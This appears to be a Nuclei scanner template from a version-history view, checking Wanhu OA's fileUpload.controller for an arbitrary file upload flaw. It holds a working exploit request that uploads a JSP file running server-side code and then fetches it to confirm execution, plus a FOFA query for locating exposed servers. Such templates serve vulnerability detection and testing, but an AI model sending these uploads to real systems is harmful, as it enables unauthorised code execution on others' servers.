nuclei-templates/http/vulnerabilities/wanhu/wanhu-oa-fileupload-control...

54 lines
2.3 KiB
YAML
Raw Normal View History

2023-09-08 11:25:00 +00:00
id: wanhu-oa-fileupload-controller
2023-08-18 03:22:06 +00:00
info:
2023-09-08 11:25:00 +00:00
name: Wanhu OA Fileupload Controller - Arbitrary File Upload
2023-08-18 03:22:06 +00:00
author: SleepingBag945
severity: critical
2023-09-08 11:25:00 +00:00
description: |
There is an arbitrary file upload vulnerability in Wanhu OA fileUpload.controller. An attacker can upload any file through the vulnerability.
2023-08-18 03:22:06 +00:00
reference:
2023-09-08 11:25:00 +00:00
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/oa/%E4%B8%87%E6%88%B7OA/%E4%B8%87%E6%88%B7OA%20fileUpload.controller%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md?plain=1#L24
- https://github.com/tr0uble-mAker/POC-bomber/blob/d2433ac41eaa58eb4fb0876ec05e3b645e10ecd7/pocs/redteam/wanhu_oa_fileupload-controller_fileupload_2022.py#L20
metadata:
verified: true
2023-10-14 11:27:55 +00:00
max-request: 2
2023-09-08 11:25:00 +00:00
fofa-query: app="万户网络-ezOFFICE"
2023-10-14 11:27:55 +00:00
tags: wanhu,oa,fileupload,controller,intrusive
2023-09-08 11:25:00 +00:00
variables:
num1: "{{rand_int(1000, 9999)}}"
num2: "{{rand_int(1000, 9999)}}"
result: "{{to_number(num1)*to_number(num2)}}"
2023-08-18 03:22:06 +00:00
http:
- raw:
- |
POST /defaultroot/upload/fileUpload.controller HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed
Cookie: OASESSIONID=416B4CE965CD27DEED8197A8528A33E6
--b0d829daa06c13d6b3e16b0ad21d1eed
2023-09-08 11:25:00 +00:00
Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp"
2023-08-18 03:22:06 +00:00
Content-Type: application/octet-stream
2023-09-08 11:25:00 +00:00
<%out.print({{num1}}*{{num2}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
2023-08-18 03:22:06 +00:00
--b0d829daa06c13d6b3e16b0ad21d1eed--
- |
GET /defaultroot/upload/html/{{filename}} HTTP/1.1
Host: {{Hostname}}
2023-09-08 11:25:00 +00:00
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && contains(body_1, "\"result\":\"success\"") && contains(body_1,"fileSize")'
- 'status_code_2 == 200 && contains(body_2,"{{result}}")'
condition: and
2023-08-18 03:22:06 +00:00
extractors:
- type: regex
name: filename
group: 1
regex:
- '"data":"(.*?)"'
2023-10-14 11:27:55 +00:00
internal: true
# digest: 4a0a004730450220285126b729ccfd09f0e766a08c863930f1745d4071db7394de32056e9ff8dbf4022100f804bdbc219b632b22c97298af1e2d8eddf3c193532ce219e906096c2ff25f2b:922c64590222798bb761d5b6d8e72950